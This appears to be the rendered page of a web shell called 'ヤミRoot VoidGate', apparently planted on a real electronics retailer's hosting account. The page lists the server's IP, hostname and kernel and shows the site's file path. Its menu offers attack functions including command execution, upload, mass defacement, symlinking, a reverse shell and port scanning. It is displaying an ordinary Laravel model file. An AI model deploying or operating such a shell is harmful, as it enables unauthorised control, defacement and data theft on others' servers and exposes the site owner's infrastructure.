ヤミRoot VoidGate
User / IP
:
216.73.216.134
Host / Server
:
191.96.144.97 / www.jigishaelectronics.com
System
:
Linux us-bos-web1572.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u852776893
/
domains
/
jigishaelectronics.com
/
public_html
/
app
/
Models
/
Viewing: SubSubCategory.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; use App\Traits\PreventDemoModeChanges; use Illuminate\Database\Eloquent\Builder; /** * App\Models\SubSubCategory * * @property int $id * @property int $sub_category_id * @property string $name * @property string $brands * @property \Illuminate\Support\Carbon $created_at * @property \Illuminate\Support\Carbon $updated_at * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory newModelQuery() * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory newQuery() * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory query() * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory whereBrands($value) * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory whereCreatedAt($value) * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory whereId($value) * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory whereName($value) * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory whereSubCategoryId($value) * @method static \Illuminate\Database\Eloquent\Builder|\App\Models\SubSubCategory whereUpdatedAt($value) * @mixin \Eloquent */ class SubSubCategory extends Model { use PreventDemoModeChanges; protected static function boot() { parent::boot(); static::addGlobalScope('alphabetical', function (Builder $builder) { $builder->orderBy('name', 'asc'); }); } public function subCategory() { return $this->belongsTo(SubCategory::class); } }
Coded With 💗 by
0x6ick